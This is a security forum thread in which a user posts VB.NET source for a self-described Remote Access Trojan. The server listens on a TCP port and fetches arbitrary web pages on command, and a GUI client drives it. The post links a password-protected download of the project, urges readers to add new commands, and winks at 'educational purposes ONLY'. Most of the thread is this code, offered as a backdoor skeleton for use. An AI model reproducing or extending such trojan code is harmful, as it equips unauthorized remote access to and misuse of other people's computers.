Government Security
Network Security Resources

Jump to content

Photo

A Simple Client/server Rat In Vb8

- - - - - backdoor
  • Please log in to reply
2 replies to this topic

#1 Thiseas

Thiseas

    Private

  • Members
  • 13 posts

Posted 04 January 2010 - 06:28 AM

 According to  Webopedia a RAT is:
Short for Remote Access Trojan, a Trojan horse that provides the intruder, or hacker, with a backdoor into the infected system. This backdoor allows the hacker to snoop your system, use your infected system to launch a zombie (attacks on other systems), or even run malicious code.

I decided to create such a program in vb8 Express Edition, to point out the power of .net library. I must say that my program (actually is a client/server pair) can be implemented in C# as well. In our days (for my opinion) the choice between C# and VB is not a dilemma any more. The underlying framework (the .net 2.0 - 3.5) resolve any difficulties.

About the server:
It listens at a specific port for a client command.
Available commands:
If the first letter of the packet send by the client is "1" then this is considered as a "ping" request. So, the server responses with a "IREM m here baby!"
If the first letter of the packet send by the client is "2" then this is considered as an HTTP request. So, the server access the specified page and send the web response to the client as an html page.


About the client:
Sends commands and receives responses from the server.
Available commands:
If the first letter of the packet send by the client is "1" then this is considered as a "ping" request
(i.e. The "R u there" checkbox must be checked! The server should answer with a "IREM m here baby!"
If the first letter of the packet send by the client is "2" then this is considered as an HTTP request. The server access the specified page and send the web response to the client as an html page. The page is displayed as html-text as well as html-look in the pages: Html-Response & Web Browser respectively.

You can download the full project, from
http://rapidshare.co...0212384/RAT.zip
Password: p0wnbox.com

The program uses .net framework 2.0 and above.

I have tested the server in Windows XP Pro (with .net 2.0) , Windows XPPro  (with .net 3.5) and  Windows 7 Home Premium. I have test the client in windows 7. The Client/Server pair have been tested in a LAN as well as in a virtual machine environment.


You can use this program by any mean you like, except for lammer (aka stupid) purposes. It is not necessary a reference to the author of the program or any other remark or any kind of laudation. This is a tutorial, so the scope is the knowledge and only the knowledge. Our "HowToBeFamous" dept has been closed, a long time ago...

I strongly suggest you to extend it to handle new commands. It is very easy!

I bet that you gonna use it for educational purposes ONLY.
Am i right?


Thnx... I appreciate!

PS: Any remarks and/or/xor suggestions would be greatly welcome...

The server code:
REM *********************************************************************
 REM  A simple remote access server.
 REM  It listens at a specific port for a client command.
 REM  Available commands:
 REM  1. If the first letter of the packet send by the client is "1" then this is considered as a "ping" request.
 REM     So, the server responses with a "IREM m here baby!"
 REM  2. If the first letter of the packet send by the client is "2" then this is considered as an HTTP request.
 REM     So, the server access the specified page and send the web response to the cient as an html page.
 REM  
 REM  (C) by Thiseas @ 04th Jan 2010 - SeiriosB@yahoo.gr
 REM  Greetz to p0wnbox team @ www.p0wnbox.com
 REM 
 REM 
 REM  REMARKS:
 REM  You can get this program and extend it to handle any commands you want.
 REM  I bet that you gonna use it for educational purposes ONLY. Am i right? <img src='http://www.governmentsecurity.org/forum/public/style_emoticons/<#EMO_DIR#>/wink.gif' class='bbc_emoticon' alt=';)' />
 REM  thx... I appreciate!
 REM ****************************************************************************************************************
 Imports System.Net.Sockets
 Imports System.Net
 Imports System.Text
 Imports System.IO

 Class TCPSrv
     Const BUFFER_SIZE As Integer = 512



     Shared Sub Main(ByVal args As String())
         REM  Must listen on correct port- must be same as port client wants to connect on.
         Dim portNumber As Integer = 8000 REM  My default port.
         Dim serverIP As IPAddress = IPAddress.Parse("127.0.0.1") REM  My default IP.
         Dim i As Integer = 0

         REM  If arguments exist the use them overwriting the defaults.
         While i < args.Length

             Select Case args(i)
                 Case "/p"           REM  Port Flag parameter. If not entered, port 8000 will be used.
                     i += 1          REM  Skip to the actual port parameter.
                     portNumber = Integer.Parse(args(i))
                 Case "/h"           REM  Hosts IP Flag parameter. If not entered, ip 127.0.0.1 will be used.
                     i += 1          REM  Skip to the actual IP parameter.
                     serverIP = IPAddress.Parse(args(i))
             End Select
             i += 1                  REM  Skip to the next argument.
         End While

         Dim tcpListener As New TcpListener(serverIP, portNumber)

         Try

             While (1 = 1)
                 tcpListener.Start()
                 Console.WriteLine("Server is listening on {0}:{1}...", serverIP, portNumber)

                 REM Waiting for a client to be connected. 
                 Dim tcpClient As TcpClient = tcpListener.AcceptTcpClient()

                 Console.WriteLine("Connection accepted.")
                 REM  Get the stream
                 Dim networkStream As NetworkStream = tcpClient.GetStream()

                 REM  Read the client command into an 8k buffer. It could not be greater <img src='http://www.governmentsecurity.org/forum/public/style_emoticons/<#EMO_DIR#>/wink.gif' class='bbc_emoticon' alt=';)' />
                 Dim bytes(8000) As Byte
                 networkStream.Read(bytes, 0, 8000)

                 REM  Return the data received from the client to the console.
                 Dim clientdata As String = Encoding.ASCII.GetString(bytes)

                 Dim iPos As Integer = InStr(clientdata, Chr(0))
                 If iPos > 0 Then clientdata = Left(clientdata, iPos - 1)

                 REM Acccording to the packet (its 1st letter) send by the client we answer
                 If clientdata.Substring(0, 1) = "1" Then     REM Command #1: R u Up request.
                     Dim responseString As String = "IREM m here baby!"
                     Dim sendBytes As [Byte]() = Encoding.ASCII.GetBytes(responseString)
                     networkStream.Write(sendBytes, 0, sendBytes.Length)
                 ElseIf clientdata.Substring(0, 1) = "2" Then REM Command #2: A web request.
                     REM  I consider the web request command as: "2http://www.google.com",
                     REM  so, I send the command to the "gotoWeb" function w/o its first letter.
                     Dim sTheURL As String = clientdata.Substring(1, clientdata.Length - 1)
                     TCPSrv.gotoWeb(networkStream, sTheURL)
                 Else
                     REM  Unhandled command request found!
                     Dim responseString As String = "Ops... I dont know this command!"
                     Dim sendBytes As [Byte]() = Encoding.ASCII.GetBytes(responseString)
                     networkStream.Write(sendBytes, 0, sendBytes.Length)
                 End If

                 tcpClient.Close()
                 tcpListener.Stop()

             End While
         Catch e As Exception
             REM  A serious error occured. Display its description to the console.
             Console.WriteLine(e.ToString())
         Finally
             tcpListener.Stop()
         End Try
     End Sub

     REM ***************************************************************************************
     REM  This is a very simple function to access a web server (via HTTP), get the server response,
     REM  store this response to a string and send it via TCP to the client.
     REM 
     Shared Sub gotoWeb(ByVal netStream As NetworkStream, ByVal sUrl As String)
         Dim sendBytes As [Byte]()
         Dim sWebHtmlResponse As String

         Try

             REM  Create a REM WebRequestREM  object with the specified url 
             Dim myWebRequest As WebRequest = WebRequest.Create(sUrl)

             REM  Send the REM WebRequestREM  and wait for response.
             Dim myWebResponse As WebResponse = myWebRequest.GetResponse()

             Dim sPageEncoding As String = DirectCast(myWebResponse, System.Net.HttpWebResponse).CharacterSet

             REM  Call method REM GetResponseStreamREM  to obtain stream associated with the response object
             Dim ReceiveStream As Stream = myWebResponse.GetResponseStream()

             REM  If the operating system has the encoding of the web page then use it, otherwise use the default.
             Dim encode As Encoding
             Try
                 encode = System.Text.Encoding.GetEncoding(sPageEncoding)
             Catch ex As Exception
                 encode = System.Text.Encoding.Default
             End Try

             REM  Pipe the stream to a higher level stream reader with the required encoding format.
             Dim readStream As New StreamReader(ReceiveStream, encode)
             Dim read(256) As Char

             REM  Read 256 characters at a time.
             Dim count As Integer = readStream.Read(read, 0, 256)
             sWebHtmlResponse = ""
             While count > 0
                 REM  Dump the 256 characters on a string .
                 Dim str As New [String](read, 0, count)
                 sWebHtmlResponse += str
                 count = readStream.Read(read, 0, 256)
             End While

             REM  Add a new line to the webResponse string.
             sWebHtmlResponse += ControlChars.Lf + ControlChars.Cr

             REM  Release the resources of stream object.
             readStream.Close()

             REM  Release the resources of response object.
             myWebResponse.Close()

             REM Send the Html Response to the client in UTF-8 format.    
             sendBytes = Encoding.UTF8.GetBytes(sWebHtmlResponse)
             netStream.Write(sendBytes, 0, sendBytes.Length)


         Catch ex As Exception
             REM Ops! An error occur, inform the client about it!
             sendBytes = Encoding.ASCII.GetBytes(ex.Message)
             netStream.Write(sendBytes, 0, sendBytes.Length)

         End Try
     End Sub
   
 End Class
..and the more important code fragment from the client:

REM *********************************************************************
REM  A simple client.
 REM  It sends commands at a specific port at a specific address.
 REM  Available commands:
 REM  1. If the first letter of the packet send by the client is "1" then this is considered as a "ping" request 
 REM     (i.e. The "R u there" checkbox must be checked!
 REM     The server sould considered with a "IREM m here baby!"
 REM  2. If the first letter of the packet send by the client is "2" then this is considered as an HTTP request.
 REM     The server access the specified page and send the web response to the cient as an html page.
 REM     The page is displyed as html-text as well as html-look in the pages: Html-Response & Web Browser respectively.
 REM  
 REM  (C) by Thiseas @ 04th Jan 2010 - SeiriosB@yahoo.gr
 REM  Greetz to p0wnbox team @ www.p0wnbox.com
 REM 
 REM 
 REM  REMARKS:
 REM  You can get this program and extend it to handle any commands you want.
 REM  I bet that you gonna use it for educational purposes ONLY. Am i right? <img src='http://www.governmentsecurity.org/forum/public/style_emoticons/<#EMO_DIR#>/wink.gif' class='bbc_emoticon' alt=';)' />
 REM  thx... I appreciate!
 REM ****************************************************************************************************************Imports System.Net.Sockets
 Imports System.Text
 Imports System.IO

 Public Class Form1

     Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
         Dim tcpClient As New System.Net.Sockets.TcpClient()
         Dim sInformation As String

         REM Clear the pages
         RichTextBox1.Clear()
         WebBrowser1.Navigate("about:blank")

         REM  Inform the user about the response time
         sInformation = "Client Requests @ " + DateTime.Now.ToString
         ListBox1.Items.Add(sInformation)

         Try
             tcpClient.Connect(TextBox_IP.Text, NumericUpDown_Port.Value)

             Dim networkStream As Net.Sockets.NetworkStream = tcpClient.GetStream()
             If networkStream.CanWrite And networkStream.CanRead Then
                 Dim sendBytes As [Byte]() = Nothing
                 Dim s As String
                 Dim i As Int32
                 Dim bytes(tcpClient.ReceiveBufferSize) As Byte

                 If CheckBox_handshake.Checked = True Then
                     sendBytes = Encoding.ASCII.GetBytes("1.Is anybody there?")
                     networkStream.Write(sendBytes, 0, sendBytes.Length)
                     REM  Read the NetworkStream into a byte buffer.
                     networkStream.Read(bytes, 0, CInt(tcpClient.ReceiveBufferSize))
                     REM  Output the data received from the host to the listbox.
                     s = Space(5) + Encoding.ASCII.GetString(bytes)
                     ListBox1.Items.Add(s)
                     sInformation = "Server Respond @ " + DateTime.Now.ToString
                     ListBox1.Items.Add(sInformation)

                 Else
                     REM  Send the request to the server.
                     s = "2" + TextBox_URL.Text
                     sendBytes = Encoding.ASCII.GetBytes(s)
                     networkStream.Write(sendBytes, 0, sendBytes.Length)

                     REM  Read the Packet: The HTML page.
                     REM  Loop to receive all the data sent by the server.
                     s = ""
                     i = networkStream.Read(bytes, 0, bytes.Length)
                     While (i <> 0)
                         REM  Translate data bytes to a UTF8 string.
                         s += System.Text.Encoding.UTF8.GetString(bytes, 0, i)
                         i = networkStream.Read(bytes, 0, bytes.Length)
                     End While

                     REM  Inform the user about the response time
                     sInformation = "Server Respond @ " + DateTime.Now.ToString
                     ListBox1.Items.Add(sInformation)


                     REM Update the ritch-text with the HTML response.
                     RichTextBox1.Text = s

                     REM Write the HTML contents to a file and force browser to read it.
                     Using sw As StreamWriter = New StreamWriter("CurrentReadPage.htm", False, System.Text.Encoding.GetEncoding("UTF-8"))
                         sw.Write(s)
                         sw.Close()
                     End Using
                     Dim sCurrentFilePath As String = Environment.CurrentDirectory()
                     sCurrentFilePath += "\CurrentReadPage.htm"
                     WebBrowser1.Navigate(sCurrentFilePath)


                 End If
             Else
                 If Not networkStream.CanRead Then
                     ListBox1.Items.Add("Fail to write data to the stream.")
                 ElseIf Not networkStream.CanWrite Then
                     ListBox1.Items.Add("Fail to read data from the stream.")
                     tcpClient.Close()
                 End If
             End If
         Catch ex As Exception
             ListBox1.Items.Add(ex.Message)
         End Try


     End Sub
 End Class

 
when you 've got a hammer everything starts to look like a nail...

#2 cozyhomer

cozyhomer

    Private

  • Members
  • 1 posts

Posted 12 February 2010 - 08:21 AM

Hi can you please give me the full rapidshare download linkPosted Image

#3 Thiseas

Thiseas

    Private

  • Members
  • 13 posts

Posted 20 February 2010 - 03:30 AM

Hi can you please give me the full rapidshare download linkPosted Image


You can download the VB 8 full project, from here: http://rapidshare.co...0212384/RAT.zip
when you 've got a hammer everything starts to look like a nail...





Also tagged with one or more of these keywords: backdoor